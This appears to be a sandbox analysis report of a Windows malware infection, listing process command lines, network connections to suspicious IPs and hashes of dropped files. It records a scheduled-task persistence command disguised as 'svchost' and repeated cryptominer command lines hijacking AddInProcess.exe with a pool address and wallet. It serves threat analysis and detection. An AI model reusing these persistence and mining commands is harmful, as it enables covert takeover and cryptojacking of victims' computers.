"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53e5f022-890f-4641-bc25-6435b881c0a7} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" gpu

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=1940 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2600 /prefetch:8

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bbd761e-7204-4378-bc7c-64570d4434fc} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" socket

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 1 -isForBrowser -prefsHandle 3292 -prefMapHandle 3188 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fc26526-eabd-4dc7-9f61-97d1368d5d9a} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3756 -childID 2 -isForBrowser -prefsHandle 2880 -prefMapHandle 3200 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {328eb413-cf5c-4040-baf6-6352daf96de4} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4620 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4612 -prefMapHandle 4608 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {367c94ec-d0da-40e9-881f-6a57780e030e} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" utility

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3172 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 3 -isForBrowser -prefsHandle 5484 -prefMapHandle 5480 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56b2e0f3-cc98-4896-8892-5958027b8893} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5612 -childID 4 -isForBrowser -prefsHandle 5372 -prefMapHandle 5620 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddc51cbc-d576-46b5-9838-d03e866fba5b} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5880 -childID 5 -isForBrowser -prefsHandle 5800 -prefMapHandle 5804 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa4773f0-857f-4bd6-84d5-12fdc287b3fc} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab

C:\Users\Admin\1000029002\a2f7c1badc.exe

"C:\Users\Admin\1000029002\a2f7c1badc.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe

"C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe"

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe

"C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5692 -ip 5692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 1096

C:\Users\Admin\AppData\Local\Temp\pureee.exe

"C:\Users\Admin\AppData\Local\Temp\pureee.exe"

C:\Users\Admin\AppData\Local\Temp\adada.exe

"C:\Users\Admin\AppData\Local\Temp\adada.exe"

C:\Users\Admin\AppData\Local\Temp\dropperrr.exe

"C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DirectX11\em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=844,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4348 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
RU 185.215.113.19:80 185.215.113.19 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 19.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
FR 142.250.179.110:443 www.youtube.com tcp
US 8.8.8.8:53 110.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
FR 142.250.178.142:443 www.youtube.com tcp
FR 142.250.178.142:443 www.youtube.com tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
FR 142.250.178.142:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net tcp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
FR 172.217.18.206:443 consent.youtube.com udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 206.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 142.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 197.205.238.44.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
FR 142.250.179.110:443 www.youtube.com tcp
US 8.8.8.8:53 227.74.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.18.206:443 www.youtube.com tcp
FR 172.217.20.196:443 www.google.com udp
US 8.8.8.8:53 67.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 106.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.20.217.172.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
N/A 224.0.0.251:5353 udp
NL 91.92.240.111:80 91.92.240.111 tcp
FR 172.217.20.196:443 www.google.com tcp
US 8.8.8.8:53 111.240.92.91.in-addr.arpa udp
FR 172.217.20.196:443 www.google.com tcp
RU 85.28.47.31:80 85.28.47.31 tcp
US 8.8.8.8:53 31.47.28.85.in-addr.arpa udp
NL 91.92.240.111:1334 91.92.240.111 tcp
N/A 127.0.0.1:64329 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
N/A 127.0.0.1:64349 tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
NL 91.92.240.111:80 91.92.240.111 tcp
CH 185.196.9.187:80 185.196.9.187 tcp
US 8.8.8.8:53 187.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
US 8.8.8.8:53 redirector.gvt1.com udp
FR 172.217.20.174:443 redirector.gvt1.com tcp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
NL 91.92.240.111:39001 tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
FR 172.217.20.174:443 redirector.gvt1.com udp
US 8.8.8.8:53 r1---sn-aigzrnsr.gvt1.com udp
GB 74.125.175.38:443 r1---sn-aigzrnsr.gvt1.com tcp
US 8.8.8.8:53 r1.sn-aigzrnsr.gvt1.com udp
US 8.8.8.8:53 r1.sn-aigzrnsr.gvt1.com udp
GB 74.125.175.38:443 r1.sn-aigzrnsr.gvt1.com udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 155.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 174.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 38.175.125.74.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
FR 142.250.201.174:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
FR 142.250.201.174:443 play.google.com udp
US 8.8.8.8:53 174.201.250.142.in-addr.arpa udp
NL 91.92.240.111:80 91.92.240.111 tcp
FR 142.250.201.174:443 play.google.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
FR 142.250.201.174:443 play.google.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
FR 172.217.18.206:443 www.youtube.com udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp

Files

memory/4788-0-0x0000000000680000-0x0000000000B39000-memory.dmp

memory/4788-1-0x0000000077D74000-0x0000000077D76000-memory.dmp

memory/4788-2-0x0000000000681000-0x00000000006AF000-memory.dmp

memory/4788-3-0x0000000000680000-0x0000000000B39000-memory.dmp

memory/4788-4-0x0000000000680000-0x0000000000B39000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

MD5 c015c231f5d013a7031748f95129a969
SHA1 27f74431dbaa7b8bd16a5ddc0b871da65ea62849
SHA256 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4
SHA512 baf6f0d3752e49ad769325bde85129d803094ea42e9d9735eafb3f415014e6d2f07a977d8892fef85307bc80e0060f0ef3c364ef3b6d05a0d4324956723a194e

memory/3116-17-0x00000000001B0000-0x0000000000669000-memory.dmp

memory/4788-16-0x0000000000680000-0x0000000000B39000-memory.dmp

memory/3116-18-0x00000000001B1000-0x00000000001DF000-memory.dmp

memory/3116-19-0x00000000001B0000-0x0000000000669000-memory.dmp

memory/3116-20-0x00000000001B0000-0x0000000000669000-memory.dmp

memory/3116-21-0x00000000001B0000-0x0000000000669000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe

MD5 4b67af171faedf1786697467acdbc63c
SHA1 b9bf249f79a7af45119326475533ab5fadd66b6b
SHA256 1dab3f3893bd28640fb2baa2caa5ccc03de88400c03b01ca2a1697e2c9f51428
SHA512 f5e7dfa827cd578dd0b4cc3f798c98ecc2081d214f7c04f70b82373ed54f9d1018435b54395b3a013b759bddb4dc1a9521cfcdd49c93be486af3d998e580265a

C:\Users\Admin\AppData\Local\Temp\C37F.tmp\C380.tmp\C381.bat

MD5 de9423d9c334ba3dba7dc874aa7dbc28
SHA1 bf38b137b8d780b3d6d62aee03c9d3f73770d638
SHA256 a1e1b422c40fb611a50d3f8bf34f9819f76ddb304aa2d105fb49f41f57752698
SHA512 63f13acd904378ad7de22053e1087d61a70341f1891ada3b671223fec8f841b42b6f1060a4b18c8bb865ee4cd071cadc7ff6bd6d549760945bf1645a1086f401

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 78d53c4ecb4f237a195804abc28ebb1e
SHA1 5b036abe11431d0c164cc5427aa7eaaa2d8d1580
SHA256 b1ead24150c5c17d1e8cdfaa64b4395cb1b0872c6f4bb25eb8e024ba0e39c847
SHA512 90c1e12b736dc1a644262a44141f4bd7eb5fe935249978d1ff083e39017652ab847107add5b5fbeec6318db181cd22a728938fba7c384c8023ed8e3c03e61496

\??\pipe\crashpad_2348_OZCJVAPOWAPEBRXD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8edf5aee848362b3fa4c7102382947c3
SHA1 0ca71672592fef3c37dbf92a155d747c927b433f
SHA256 16594552785f10884854bf38d179c9c3d26d023a089180bfe5a3ceb03c395e6d
SHA512 a8863cfcea01c05938edd34690db467f0d429f0598528f23392ca7e7233a9b2fe2eaf7b886ac965e22e8c63ee79af84654e5b2f7e94033e5f54622f7b9584893

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 924aa76b0ca7012f88169d83f98c702a
SHA1 38fab8bce006523d9c015a635fd5e8dd3015d6d1
SHA256 dad2a74805c73c49a73cde699fb1e643c4276d4fa7b7e86cd8e7f2c12ff10250
SHA512 fbe68247db2a5cbb11f4157c96034cc108bdeff2420485e468b8e621b204a56e249070dede2ad6190cbd00cbc61bf6ec1a6b6e413e3da741958b00c865fa6964

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\datareporting\glean\pending_pings\da4aace6-cac7-4888-95ac-f55743e2ba0e

MD5 c1b2575d9a77e32b8624eb63ce1acf33
SHA1 e458a17e2ec369821938615ccaf0b0bed8445cb7
SHA256 47010e7fd9bc931b3b264c3d1c3030e4c69f5b539358de636799a163fa040407
SHA512 9540e8e52332a07bf2b689f769634edd56e84111532db02c684adc713a3692d02a3799545d2f4f63b355373d4e8e71bfa059b6c9344087b2bdefa78aa7203cf3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\datareporting\glean\pending_pings\f1e5ba4d-8b3b-41e2-8819-c17484304293

MD5 2cc068bda5f96603531f8ab25357eb86
SHA1 edd4accb5e5846287fd2a7d72627375296e0e8a1
SHA256 05776cf1a9b79c7b1a6cbc24451607731fb0f6b8ab0cc9952ef74fa596af408f
SHA512 fa016e1ccdd91a23fe276a7ca1649d36adf049ef5955b5c1f0cb0d5f12dad48656086eba1431e61a1e3925bc31adc79e53fbe2130e374c73651e5af638f8e67f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\datareporting\glean\db\data.safe.tmp

MD5 add9b89a856e891f491535838467926c
SHA1 8da7dd5353d425ff979d9275d7f1bb96db2dfd54
SHA256 5fdca7c90197c2b957d0851989695f95f0527579d0326a5a9a3a1518f0957c3e
SHA512 5930a975800b2ea04e7274cd69b497bfa8b12f61becff415f0941cfd4e0d972d072ff131915d3f27a139883efbd8b4c7b4a7830c5fbfa094b4aa8616921c8de8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\99o3eutv.default-release\activity-stream.discovery_stream.json.tmp

MD5 a3187051d56ac6abcedc95fec634cf1c
SHA1 7c67fb6c9896bf7d39e4e39f539b655acf85041c
SHA256 5a348dd05ab10b891bfd023011f0c70e7a323a2ae064544b9c26a5d57b936c36
SHA512 069d04b71eaf1def1e1b6070ea7bea73a9e15e9553e6451dfdd31af95e31b0b26c0f2e315d4664c7cbce3df03c937d3b98d4c64497b611b43e18b9d168a07121

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\datareporting\glean\db\data.safe.tmp

MD5 7727716a5627052c27f26410609c5aaf
SHA1 bb7a9a648b05ac407e37d581ecf138dd03e58070
SHA256 088ef036efc569072c89dc06647e9139ee428d362fb85d818182dfc1616cf49b
